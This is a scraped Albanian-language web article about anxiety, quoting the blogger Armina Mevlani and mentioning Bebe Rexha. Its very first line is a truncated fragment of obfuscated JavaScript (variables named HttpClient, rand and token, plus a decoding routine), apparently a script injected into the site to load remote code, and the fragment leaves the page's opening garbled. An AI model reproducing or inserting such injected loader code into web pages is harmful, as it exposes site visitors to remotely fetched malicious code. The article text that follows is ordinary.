;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Blogerja e njohur shqiptare flet hapur për ankthin dhe çka e ndihmon atë

By

Stigmatizimi rreth termit ‘ankth’, është zhveshur pothuajse i tëri, sidomos në kohën kur shumë të famshëm, pohuan se u ndodh edhe atyre.

Ankthi shpeshherë një emocion normal dhe i shëndetshëm, edhe në rastet kur është shumë i shprehur, është diçka që trajtohet.

Edhe blogerja/sipërmarrësja e njohur shqiptare Armina Mevlani foli për mënyrën se si ajo e përjeton ankthin.

Në opsionin për të aktivizuar pyetje përgjigje interaktive me ndjekësit e saj, Armina u pyet nga një ndjeks se nëse ka vuajtur nga ankthi ndonjëherë.

“Mendoj që në një moment të caktuar, ne të gjithë vuajmë nga ankthi. Është normale të ndihesh i pasigurt për jetën sepse asgjë nuk është e garantuar! Un vuaj më shumë nga stomaku pas sulmeve të ankthit, por zakonisht në periudha të caktuara sepse nuk është një gjë konstante. Mundohem të shoh anën e mirë të gjërave dhe bëj shumë joga.” – u përgjigj Mevlani.

Edhe Bebe Rexha gjithnjë ka qenë e zëshme për luftën e saj me ankthin, si ndikon te ajo dhe si e lufton.

Flet gjithnjë hapur për shëndetin e saj mendor, Bebe Rexha jep këshilla si ta luftojmë ankthin

Të pasurit ankth në të vërtetë nuk është gjithnjë diçka e keqe, në një hulumtim të publikuar nga revista Forbes, është gjetur korrelacion pozitiv mes ankthit dhe IQ-s së lartë:

Sipas hulumtimit të publikuar në Forbes, këto 5 gjëra e dëshmojnë që jeni të zgjuar

 

 

 

Artikuj të ngjashëm